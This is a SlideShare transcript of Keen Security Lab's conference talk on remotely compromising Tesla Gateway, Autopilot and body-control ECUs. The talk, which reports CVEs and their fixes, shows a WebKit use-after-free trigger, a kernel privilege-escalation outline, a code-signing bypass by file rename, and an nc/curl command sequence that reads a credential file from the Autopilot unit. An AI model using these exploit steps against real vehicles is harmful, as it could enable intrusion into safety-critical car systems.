SlideShare a Scribd company logo

Over-the-Air: How we Remotely Compromised the Gateway, BCM, and Autopilot ECUs of Tesla Cars

Priyanka Aash
Priyanka Aash

We, Keen Security Lab of Tencent, have successfully implemented two remote attacks on the Tesla Model S/X in year 2016 and 2017. Last year, at Black Hat USA, we presented the details of our first attack chain. At that time, we showed a demonstration video of our second attack chain, but without technical aspects. This year, we are willing to share our full, in-depth details on this research. In this presentation, we will explain the inner workings of this technology and showcase the new capability that was developed in the Tesla hacking 2017. Multiple 0-days of different in-vehicle components are included in the new attack chain. We will also present an in-depth analysis of the critical components in the Tesla car, including the Gateway, BCM(Body Control Modules), and the Autopilot ECUs. For instance, we utilized a code-signing bypass vulnerability to compromise the Gateway ECU; we also reversed and then customized the BCM to play the Model X "Holiday Show" Easter Egg for entertainment. Finally, we will talk about a remote attack we carried out to successfully gain an unauthorized user access to the Autopilot ECU on the Tesla car by exploiting one more fascinating vulnerability. To the best of our knowledge, this presentation will be the first to demonstrate hacking into an Autopilot module.

Technology
1 of 86
Download to read offline
How we Remotely Compromised the Gateway, BCM, and Autopilot ECUs of Tesla Cars
• Tencent Keen Security Lab • Researchers in KeenLab who are focusing on the research of connected cars.
1. 2. 3. 4. 5. Root APE from CID Bypass Code Signing Protection OTA Overview Easter Egg
• User-Agent • Mozilla/5.0 (X11; Linux) AppleWebKit/534.34 (KHTML, like Gecko) QtCarBrowser Safari/534.34 • Webkit 534.34: 2016, 2017 • Webkit 601.1 : 2018
<!DOCTYPE html> <script> if (window.testRunner) testRunner.dumpAsText(); function eventhandler1() { var transformList = document.createElementNS("http://www.w3.org/2000/svg", "radialGradient").gradientTransform.baseVal; var transform = document.querySelector("svg").createSVGTransform(); transformList.appendItem(transform); var matrix = transform.matrix; transformList.initialize(transform); matrix.flipX(); } </script> This test passes if it doesn't crash under ASAN. <svg onload="eventhandler1()">
<!DOCTYPE html> <script> if (window.testRunner) testRunner.dumpAsText(); function eventhandler1() { var transformList = document.createElementNS("http://www.w3.org/2000/svg", "radialGradient").gradientTransform.baseVal; var transform = document.querySelector("svg").createSVGTransform(); transformList.appendItem(transform); var matrix = transform.matrix; transformList.initialize(transform); matrix.flipX(); } </script> This test passes if it doesn't crash under ASAN. <svg onload="eventhandler1()"> 1. Memory allocated 2. Memory freed 3. Used again
• Allocate transformList.appendItem(transform); • Free transformList.initialize(transform); WebCore::SVGListProperty<WebCore::SVGTransformList>::appendItemValuesAndWrappers() { … PropertyType& values = animatedList->values(); // Append the value and wrapper at the end of the list. values.append(newItem->propertyReference()); } WebCore::SVGListProperty<WebCore::SVGTransformList>::initializeValuesAndWrappers() { ... PropertyType& values = animatedList->values(); values.clear(); values.append(newItem->propertyReference()); }
• A better way to Free transformList.clear(); • Use after free matrix.flipX(); WebCore::SVGListProperty<WebCore::SVGTransformList>::clearValuesAndWrappers() { ... animatedList->values().clear(); } SVGMatrix flipX() { AffineTransform copy = *this; copy.flipX(); return static_cast<SVGMatrix>(copy); }
• Allocate transformList.appendItem(transform); • 1024 bytes • Use after free matrix.flipX(); SVGTransform SVGTransform SVGMatrix SVGMatrix
• Leak heap address m_allocBase leaked = matrix.a • Arbitrary address free matrix.a = u2d(address) array.unshift(0)
• Arbitrary address read • Construct a fake String in Array • Arbitrary address write • fastFree() the header of Uint32Array • Define a new Uint32Array(6) to construct a fake header JSValue Fake JSC::StringObject Fake JSC::JSString Fake WTF::StringImpl UAF
• Old kernel • New kernel • Protection • PXN/PAN Emulation Enabled CONFIG_CPU_SW_DOMAIN_PAN=y • dmesg restriction CONFIG_SECURITY_DMESG_RESTRICT=y • NO KASLR
• Memory manager for Tegra GPU. •ioctl() •NVMAP_IOC_CREATE •NVMAP_IOC_ALLOC •NVMAP_IOC_FREE •NVMAP_IOC_MMAP •NVMAP_IOC_PIN_MULT •…
• copy structure nvmap_pin_handle from user memory to kernel memory struct nvmap_pin_handle { unsigned long handles; /* array of handles to pin/unpin */ unsigned long addr; /* array of addresses to return */ __u32 count; /* number of entries in handles */ }; handles addr count …
• Process every nvmap_handle structure in array handles • Root Cause int nvmap_pin_ids(struct nvmap_client *client, unsigned int nr, const unsigned long *ids) { for (i = 0; i < nr && !ret; i++) { ref = _nvmap_validate_id_locked(client, ids[i]); if (ref) { ... } else { … verify = nvmap_validate_get(client, ids[i]); if (verify) ... else ret = -EPERM; nvmap_ref_lock(client); } } nr = i; validate …
• Trigger the vulnerability int nvmap_pin_ids(struct nvmap_client *client, unsigned int nr, const unsigned long *ids) { ... if (ret) goto out; ... out: if (ret) { nvmap_ref_lock(client); ... for (i = 0; i < nr; i++) nvmap_handle_put(h[i]); } return ret; }
• Arbitrary address decrease by one • nvmap_handle static inline void nvmap_handle_put(struct nvmap_handle *h) { int cnt = atomic_dec_return(&h->ref); if (WARN_ON(cnt < 0)) { pr_err("%s: %s put to negative referencesn", __func__, current->comm); } else if (cnt == 0) _nvmap_handle_free(h); } node ref pin … … … … ... … …
• Hijack $PC Syscall table … sys_accept4 – 0x10 … -0x10
• JOP gadgets on v8.1(17.24.28) • Read memory • Write memory • Write • syscall(SYS_ACCEPT4, 0, target_address – gadget_address, half_value, gadget_address, 0, 0, RET_FAST_SYSCALL);
• Bypass AppArmor • Patch aa_g_profile_mode with APPARMOR_COMPLAIN • Get root • Patch setresuid()
1. 2. 3. 4. 5. Root APE from CID OTA Overview Easter Egg Hack into CID
• Update software will be load from the SD Card. • Filename is “boot.img” • Files on SD Card are transferred via Ethernet. • No signature/cert applied. Only do checksum on the file. • ➔ Upload modified software directly, and reboot to run
• Updater’s signature check is applied • Until last 0x48 bytes • SHA512 + ed25519
• Updater’s signature check is applied • Until last 0x48 bytes • SHA512 + ed25519 • Cryptographic attack? • Constants seems carefully picked, • Let’s check its implementation ;) • How the updater written to the SD card • How the updater gets executd
• File operate agent using typical TLV-style encoding scheme • For read file • And for rename uint16_t len(Data) Command Data Len Command Filename 0x000A 0x00 “file.imgx00” Len Command Filename NewName 0x13 0x02 “file.imgx00” “used.imgx00”
• In last year’s slide, we said “boot.img” is the updater, and:
• In last year’s slides, we said upload the updater directly is forbidden. • Upload “boot.img” is rejected here:
• In last year’s slides, we said upload the update software directly is not allowed. • Actually, upload and then rename it to “boot.img” is also disallowed. • Transferring the “boot.img” should be finished by the diagnostic agent.
• Diagnostic agent have a similar protocol with fixed length (0x20). • The related command is REBOOT_FOR_UPDATE(0x08). Command (uint8_t) Filename 0x08 “noboot.imgx00”
• Diagnostic agent have a similar protocol with fixed length (0x20). • The related command is REBOOT_FOR_UPDATE(0x08). • It will verify the file and its signature, and rename if correct.
File Agent SD Card File Agent SD Card Diag Agent Diag Agent NO YES Write File boot.img 1. Write File noboot.img 2. Verify File noboot.img 3. Rename
• When RESET is triggered, bootloader will be executed first • It would check if “boot.img” with a correct checksum exists in the SD card and try to boot it
• When RESET is triggered, bootloader will be executed first • It would check if “boot.img” with a correct checksum exists in the SD card and try to boot it • Bootloader will NOT check the signature, in neither v1 or v2 • Update bootloader is dangerous, since it may cause a bricked car • And without chip-level secure boot, update the bootloader is useless, since gateway code itself might also have vulns • TL;DR: we can always gain access again if a “boot.img” can be put into the SD card ;)
• Tesla is using FatFS r0.09 • Written by ChaN, and default config is nearly not changed • Before FatFS write the new name to the chunk: So would have the same effect with And gateway simply uses “strcmp” ☺ for(si =0; lfn[si]==' '|| lfn[si]=='.'; si++); /* Strip leading spaces and dots */ fatfs_rename("a.img", "x20b.img"); fatfs_rename("a.img", "b.img");
• Upload a malicious update software • And rename it • And reboot directly Len Command Filename 0x000C 0x01 “badupd.imgx00” Len Command Filename NewName 0x16 0x02 “badupd.imgx00” “x20boot.imgx00” Command (uint8_t) Padding 0x00 “x00”*32
http://www.memegen.com/meme/9sb0i3
1. 2. 3. 4. 5. Root APE from CID Bypass Code Signing Protection Easter Egg Hack into CID
• “Firmware Bundle” • A large file contains anything required to do a fresh upgrade on a Model S/X car. • Encrypted • Some modules used during deploy • Message box • CDN • Job management
• Some modules used during deploy • Message box • CDN • Job management • Each message contains a command • Firmware update can be triggered by new message in the message box • QtCar would peek unread messages actively
• Job management is a key part for OTA • Assign job ID for tracking each upgrade request • Preset checkpoints in key steps for diagnostic • POST name of the checkpoint to remote server • Engineers might set up this with a complex telemetry infrastructure for quick responding to failures
• Each ECU with Ethernet connected have a upgrade agent • ic-updater, cid-updater, … • Nearly same framework • CID is getting the firmware and distribute it over the car • Consider cid-updater as local server, and ic-updater as remote agent • Both of them running a service command_service_listener • Local server may get remote agent if necessary • How other components upgraded? • Take IC as a example
• For IC: • New update • Go staged • Update verified • Staging • Write firmware into B part • Staged & inactive • Reboot • Active
• ECUs like BCCEN would be connected to the gateway • What we have mentioned before: • Flashing those ECUs are performed by “boot.img” • Firmwares used by updater in “release.tgz” • Updater mode is selected by “*.upd” • Now we would introduce how those files are picked
• All firmware exists in folder deploy/seed_artifacts_v2 of the bundle • Important files: • Boot.img : Updater • Release_version.txt: Firmware version • Version_map2.tsv and Signed_metadata_map.tsv: Firmware info • Internal_option_defaults.tsv: Firmware default config • Folders, named by ECU name, like esp/, gtw/, etc. • ECUName/ProviderID/ECUFwName.hex. For example: • GTW/1/gatewayfw.hex
• *.tsv files would follow this pattern: • Signature field is added after our previous bug report • For example Version hash ECUName:Provide rID Path to firmware New name Component name Checksum Requirement s Signature ……
• Pick firmwares: • Performed by cid-updater • Get car configuration and ECU configuration • Compare with values in *.tsv • Pack into release.tar.gz • Create correct *.upd file • Transfer all those files • Reboot_for_update
1. 2. 3. 4. 5. Root APE from CID Bypass Code Signing Protection OTA Overview Hack into CID
• What is Easter egg? • A music show for Model X
BCFRON T BD-CAN Gateway CIDEthernet BCCEN BCREAR CH-CAN Actions and lights PT-CAN Status Check Music playing FOB User press
• Stage 1 : Triggers on CID • Stage 2 : Start on BCCEN • Stage 3 : Easter Egg start
• After long press of “T” button on CID CID Gateway BD-CANUDP ETH 0x2680x21e
CID Gateway 0x2310x433 UDP ETH BD-CAN BCCEN Fob Signal
• BCCEN 0x231 BCCEN Fob Signal 433Mhz Fob Signal BLE BD-CAN
• All the ECUs will follow the sync signal in BCFRONT CID GatewayUDP ETH BCFRONT BD-CAN BCREAR BCCEN ………
• BCFRONT 0x7a3 BD-CAN BCFRONT Egg table Instructions of motions Body control ECUs
• All the ECUs will follow the sync signal in BCFRONT Door Control Module RF ECU ECU Function BCFDM Door Control Module LF BCRDM Door Control Module LR BCFPM Door Control Module RF BCRPM Door Control Module RR BCCEN Central Body Control Module BCREAR Rear Body Control Module BCFRONT Front Body Control Module BCFALCD Falcon Controller Front BCFALCP Falcon Controller Rear
• Patch in CID • Reverse of ECUs • Patch in ECUs
• Patch the QtCar to simulate the press • Bypass the code and time checking
• All body control ECUs are powerpc • Identify the RTOS • Found out the segment table
• Beginning of the initialization Segment Table Source Target follow follow copy
• Segments struct egg_table_action { DWORD sour_addr; DWORD target_addr; DWORD length; };
• Locate the code to check the fob status • sub_3520A • sub_36106 check the status of fob
• Locate the data of the Egg table with segment table • The size of BCCEN firmware is large than before • Patch the size of Egg table struct egg_table_action { BYTE type; /* 0:light, 1:Wing door, 2:regular door… DWORD conf; /* actions */ DWORD time; /* time in ms */ };
1. 2. 3. 4. 5. Bypass Code Signing Protection OTA Overview Easter Egg Hack into CID
• Provides driver assistance function CID 192.168.90.100 APE 192.168.90.103 Other 192.168.90.* Gateway 192.168.90.102 IC 192.168.90.101
• TCP port 25974 • Command • TCP port 28496 • http server • commnad via http request
• handshake • install • install http://va.teslamotors.com:80/xxxxx handshake JSON
• Override handshake JSON • Used by install do_m3_factory_deploy(..., command_line, ...) { dispatch_command("override_handshake {" command_line_argument "}"); } do_install(...) { do_serve("serve start " + handshake_json["self_serve"] ); } serve arbitrary file on http server
echo -ne "m3-factory-deploy "self_serve":"/var/etc/saccess/tesla1"nexitn"|nc $APE $PORT_CMD > /dev/null sleep 5 echo -ne "install http://8.8.8.8:8888/8888nexitn" | nc $APE $PORT_CMD > /dev/null curl $APE:$PORT_HTTP/var/etc/saccess/tesla1
• auth with password from tesla1 • Execute system command with root privilege • Permit root to login via ssh
• How • m3_factory_deploy() forbided on APE • check forbidden directories in do_serve() • Fixed in mid 2017 • Vulnerability exists for less than one month
1. 2. 3. 4. 5. Root APE from CID Bypass Code Signing Protection OTA Overview Easter Egg Hack into CID
Center Information Display Gateway Autopilot ECU Body Control Modules
• Quickly fixed in few days • CVE-2017-9983: Gateway code sign protection bypass • CVE-2017-6261: Nvmap kernel local privilege escalation
• iptables • More strictly • cid-updater/ape-updater • Lots of bug fixed • saccess token no longer used as passwords • System upgrade • Can not rollback
Over-the-Air: How we Remotely Compromised the Gateway, BCM, and Autopilot ECUs of Tesla Cars

Recommended

Tesla hacking presentation fri3d
Tesla hacking presentation fri3dTesla hacking presentation fri3d
Tesla hacking presentation fri3dJasper Nuyens
 
Smartphone processors
Smartphone processorsSmartphone processors
Smartphone processorsMahzad Zahedi
 
The Heartbleed Bug
The Heartbleed BugThe Heartbleed Bug
The Heartbleed Bugn|u - The Open Security Community
 
Tesla hacking presentation
Tesla hacking presentationTesla hacking presentation
Tesla hacking presentationJasper Nuyens
 
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEEBKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEELinaro
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Introduction to the LLVM Compiler System
Introduction to the LLVM Compiler SystemIntroduction to the LLVM Compiler System
Introduction to the LLVM Compiler Systemzionsaint
 
Linux Profiling at Netflix
Linux Profiling at NetflixLinux Profiling at Netflix
Linux Profiling at NetflixBrendan Gregg
 

Recommended

Tesla hacking presentation fri3d
Tesla hacking presentation fri3dTesla hacking presentation fri3d
Tesla hacking presentation fri3dJasper Nuyens
 
Smartphone processors
Smartphone processorsSmartphone processors
Smartphone processorsMahzad Zahedi
 
The Heartbleed Bug
The Heartbleed BugThe Heartbleed Bug
The Heartbleed Bugn|u - The Open Security Community
 
Tesla hacking presentation
Tesla hacking presentationTesla hacking presentation
Tesla hacking presentationJasper Nuyens
 
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEEBKK16-110 A Gentle Introduction to Trusted Execution and OP-TEE
BKK16-110 A Gentle Introduction to Trusted Execution and OP-TEELinaro
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Introduction to the LLVM Compiler System
Introduction to the LLVM Compiler SystemIntroduction to the LLVM Compiler System
Introduction to the LLVM Compiler Systemzionsaint
 
Linux Profiling at Netflix
Linux Profiling at NetflixLinux Profiling at Netflix
Linux Profiling at NetflixBrendan Gregg
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?btpsec
 
Red Teaming macOS Environments with Hermes the Swift Messenger
Red Teaming macOS Environments with Hermes the Swift MessengerRed Teaming macOS Environments with Hermes the Swift Messenger
Red Teaming macOS Environments with Hermes the Swift MessengerJustin Bui
 
A Kernel of Truth: Intrusion Detection and Attestation with eBPF
A Kernel of Truth: Intrusion Detection and Attestation with eBPFA Kernel of Truth: Intrusion Detection and Attestation with eBPF
A Kernel of Truth: Intrusion Detection and Attestation with eBPFoholiab
 
Measurement .Net Performance with BenchmarkDotNet
Measurement .Net Performance with BenchmarkDotNetMeasurement .Net Performance with BenchmarkDotNet
Measurement .Net Performance with BenchmarkDotNetVasyl Senko
 
Linux Performance Tools
Linux Performance ToolsLinux Performance Tools
Linux Performance ToolsBrendan Gregg
 
iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersiOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersRyanISI
 
8. Software Development Security
8. Software Development Security8. Software Development Security
8. Software Development SecuritySam Bowne
 
Quickboot on i.MX6
Quickboot on i.MX6Quickboot on i.MX6
Quickboot on i.MX6Gary Bisson
 
淺談探索 Linux 系統設計之道
淺談探索 Linux 系統設計之道 淺談探索 Linux 系統設計之道
淺談探索 Linux 系統設計之道 National Cheng Kung University
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
HSM (Hardware Security Module)
HSM (Hardware Security Module)HSM (Hardware Security Module)
HSM (Hardware Security Module)Umesh Kolhe
 
Tesla Hacking to FreedomEV
Tesla Hacking to FreedomEVTesla Hacking to FreedomEV
Tesla Hacking to FreedomEVJasper Nuyens
 
Meet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingMeet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingViller Hsiao
 
The Performance Engineer's Guide To HotSpot Just-in-Time Compilation
The Performance Engineer's Guide To HotSpot Just-in-Time CompilationThe Performance Engineer's Guide To HotSpot Just-in-Time Compilation
The Performance Engineer's Guide To HotSpot Just-in-Time CompilationMonica Beckwith
 
BPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLabBPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLabTaeung Song
 
RISC-V on Edge: Porting EVE and Alpine Linux to RISC-V
RISC-V on Edge: Porting EVE and Alpine Linux to RISC-VRISC-V on Edge: Porting EVE and Alpine Linux to RISC-V
RISC-V on Edge: Porting EVE and Alpine Linux to RISC-VScyllaDB
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
フォレンジックツールの開発と実装
フォレンジックツールの開発と実装フォレンジックツールの開発と実装
フォレンジックツールの開発と実装IIJ
 
Hardware Abstraction Layer
Hardware Abstraction LayerHardware Abstraction Layer
Hardware Abstraction LayerTeh Kian Cheng
 
"Hunting the Bad Guys: Using OSINT, Social Media & other tools within Splunk"
"Hunting the Bad Guys: Using OSINT, Social Media & other tools within Splunk""Hunting the Bad Guys: Using OSINT, Social Media & other tools within Splunk"
"Hunting the Bad Guys: Using OSINT, Social Media & other tools within Splunk"Rinaldi Rampen
 
Attack your Trusted Core
Attack your Trusted CoreAttack your Trusted Core
Attack your Trusted CoreDi Shen
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 

More Related Content

What's hot

What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?btpsec
 
Red Teaming macOS Environments with Hermes the Swift Messenger
Red Teaming macOS Environments with Hermes the Swift MessengerRed Teaming macOS Environments with Hermes the Swift Messenger
Red Teaming macOS Environments with Hermes the Swift MessengerJustin Bui
 
A Kernel of Truth: Intrusion Detection and Attestation with eBPF
A Kernel of Truth: Intrusion Detection and Attestation with eBPFA Kernel of Truth: Intrusion Detection and Attestation with eBPF
A Kernel of Truth: Intrusion Detection and Attestation with eBPFoholiab
 
Measurement .Net Performance with BenchmarkDotNet
Measurement .Net Performance with BenchmarkDotNetMeasurement .Net Performance with BenchmarkDotNet
Measurement .Net Performance with BenchmarkDotNetVasyl Senko
 
Linux Performance Tools
Linux Performance ToolsLinux Performance Tools
Linux Performance ToolsBrendan Gregg
 
iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersiOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersRyanISI
 
8. Software Development Security
8. Software Development Security8. Software Development Security
8. Software Development SecuritySam Bowne
 
Quickboot on i.MX6
Quickboot on i.MX6Quickboot on i.MX6
Quickboot on i.MX6Gary Bisson
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
HSM (Hardware Security Module)
HSM (Hardware Security Module)HSM (Hardware Security Module)
HSM (Hardware Security Module)Umesh Kolhe
 
Tesla Hacking to FreedomEV
Tesla Hacking to FreedomEVTesla Hacking to FreedomEV
Tesla Hacking to FreedomEVJasper Nuyens
 
Meet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingMeet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingViller Hsiao
 
The Performance Engineer's Guide To HotSpot Just-in-Time Compilation
The Performance Engineer's Guide To HotSpot Just-in-Time CompilationThe Performance Engineer's Guide To HotSpot Just-in-Time Compilation
The Performance Engineer's Guide To HotSpot Just-in-Time CompilationMonica Beckwith
 
BPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLabBPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLabTaeung Song
 
RISC-V on Edge: Porting EVE and Alpine Linux to RISC-V
RISC-V on Edge: Porting EVE and Alpine Linux to RISC-VRISC-V on Edge: Porting EVE and Alpine Linux to RISC-V
RISC-V on Edge: Porting EVE and Alpine Linux to RISC-VScyllaDB
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
フォレンジックツールの開発と実装
フォレンジックツールの開発と実装フォレンジックツールの開発と実装
フォレンジックツールの開発と実装IIJ
 
Hardware Abstraction Layer
Hardware Abstraction LayerHardware Abstraction Layer
Hardware Abstraction LayerTeh Kian Cheng
 
"Hunting the Bad Guys: Using OSINT, Social Media & other tools within Splunk"
"Hunting the Bad Guys: Using OSINT, Social Media & other tools within Splunk""Hunting the Bad Guys: Using OSINT, Social Media & other tools within Splunk"
"Hunting the Bad Guys: Using OSINT, Social Media & other tools within Splunk"Rinaldi Rampen
 

What's hot (20)

What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?
 
Red Teaming macOS Environments with Hermes the Swift Messenger
Red Teaming macOS Environments with Hermes the Swift MessengerRed Teaming macOS Environments with Hermes the Swift Messenger
Red Teaming macOS Environments with Hermes the Swift Messenger
 
A Kernel of Truth: Intrusion Detection and Attestation with eBPF
A Kernel of Truth: Intrusion Detection and Attestation with eBPFA Kernel of Truth: Intrusion Detection and Attestation with eBPF
A Kernel of Truth: Intrusion Detection and Attestation with eBPF
 
Measurement .Net Performance with BenchmarkDotNet
Measurement .Net Performance with BenchmarkDotNetMeasurement .Net Performance with BenchmarkDotNet
Measurement .Net Performance with BenchmarkDotNet
 
Linux Performance Tools
Linux Performance ToolsLinux Performance Tools
Linux Performance Tools
 
iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersiOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for Beginners
 
8. Software Development Security
8. Software Development Security8. Software Development Security
8. Software Development Security
 
Quickboot on i.MX6
Quickboot on i.MX6Quickboot on i.MX6
Quickboot on i.MX6
 
淺談探索 Linux 系統設計之道
淺談探索 Linux 系統設計之道 淺談探索 Linux 系統設計之道
淺談探索 Linux 系統設計之道
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
HSM (Hardware Security Module)
HSM (Hardware Security Module)HSM (Hardware Security Module)
HSM (Hardware Security Module)
 
Tesla Hacking to FreedomEV
Tesla Hacking to FreedomEVTesla Hacking to FreedomEV
Tesla Hacking to FreedomEV
 
Meet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracingMeet cute-between-ebpf-and-tracing
Meet cute-between-ebpf-and-tracing
 
The Performance Engineer's Guide To HotSpot Just-in-Time Compilation
The Performance Engineer's Guide To HotSpot Just-in-Time CompilationThe Performance Engineer's Guide To HotSpot Just-in-Time Compilation
The Performance Engineer's Guide To HotSpot Just-in-Time Compilation
 
BPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLabBPF / XDP 8월 세미나 KossLab
BPF / XDP 8월 세미나 KossLab
 
RISC-V on Edge: Porting EVE and Alpine Linux to RISC-V
RISC-V on Edge: Porting EVE and Alpine Linux to RISC-VRISC-V on Edge: Porting EVE and Alpine Linux to RISC-V
RISC-V on Edge: Porting EVE and Alpine Linux to RISC-V
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
 
フォレンジックツールの開発と実装
フォレンジックツールの開発と実装フォレンジックツールの開発と実装
フォレンジックツールの開発と実装
 
Hardware Abstraction Layer
Hardware Abstraction LayerHardware Abstraction Layer
Hardware Abstraction Layer
 
"Hunting the Bad Guys: Using OSINT, Social Media & other tools within Splunk"
"Hunting the Bad Guys: Using OSINT, Social Media & other tools within Splunk""Hunting the Bad Guys: Using OSINT, Social Media & other tools within Splunk"
"Hunting the Bad Guys: Using OSINT, Social Media & other tools within Splunk"
 

Similar to Over-the-Air: How we Remotely Compromised the Gateway, BCM, and Autopilot ECUs of Tesla Cars

Attack your Trusted Core
Attack your Trusted CoreAttack your Trusted Core
Attack your Trusted CoreDi Shen
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangLyon Yang
 
Splunk: Forward me the REST of those shells
Splunk: Forward me the REST of those shellsSplunk: Forward me the REST of those shells
Splunk: Forward me the REST of those shellsAnthony D Hendricks
 
SMP implementation for OpenBSD/sgi
SMP implementation for OpenBSD/sgiSMP implementation for OpenBSD/sgi
SMP implementation for OpenBSD/sgiTakuya ASADA
 
Windows内核技术介绍
Windows内核技术介绍Windows内核技术介绍
Windows内核技术介绍jeffz
 
Track c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -eveTrack c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -evechiportal
 
Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.Priyanka Aash
 
Java Jit. Compilation and optimization by Andrey Kovalenko
Java Jit. Compilation and optimization by Andrey KovalenkoJava Jit. Compilation and optimization by Andrey Kovalenko
Java Jit. Compilation and optimization by Andrey KovalenkoValeriia Maliarenko
 
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven NieleinOSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven NieleinNETWAYS
 
SNClient+ - General purpose monitoring agent
SNClient+ - General purpose monitoring agentSNClient+ - General purpose monitoring agent
SNClient+ - General purpose monitoring agentSven Nierlein
 
Introduction to Titanium and how to connect with a PHP backend
Introduction to Titanium and how to connect with a PHP backendIntroduction to Titanium and how to connect with a PHP backend
Introduction to Titanium and how to connect with a PHP backendJoseluis Laso
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
 
Build 2016 - B880 - Top 6 Reasons to Move Your C++ Code to Visual Studio 2015
Build 2016 - B880 - Top 6 Reasons to Move Your C++ Code to Visual Studio 2015Build 2016 - B880 - Top 6 Reasons to Move Your C++ Code to Visual Studio 2015
Build 2016 - B880 - Top 6 Reasons to Move Your C++ Code to Visual Studio 2015Windows Developer
 
FIPS 140-2 Validations in a Secure Enclave
FIPS 140-2 Validations in a Secure EnclaveFIPS 140-2 Validations in a Secure Enclave
FIPS 140-2 Validations in a Secure EnclavewolfSSL
 
E yantra robot abstractions
E yantra robot abstractionsE yantra robot abstractions
E yantra robot abstractionsAkshar Desai
 
IOT Firmware: Best Pratices
IOT Firmware: Best PraticesIOT Firmware: Best Pratices
IOT Firmware: Best Praticesfarmckon
 
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocols
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocolsCONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocols
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocolsPROIDEA
 

Similar to Over-the-Air: How we Remotely Compromised the Gateway, BCM, and Autopilot ECUs of Tesla Cars (20)

Attack your Trusted Core
Attack your Trusted CoreAttack your Trusted Core
Attack your Trusted Core
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
 
Splunk: Forward me the REST of those shells
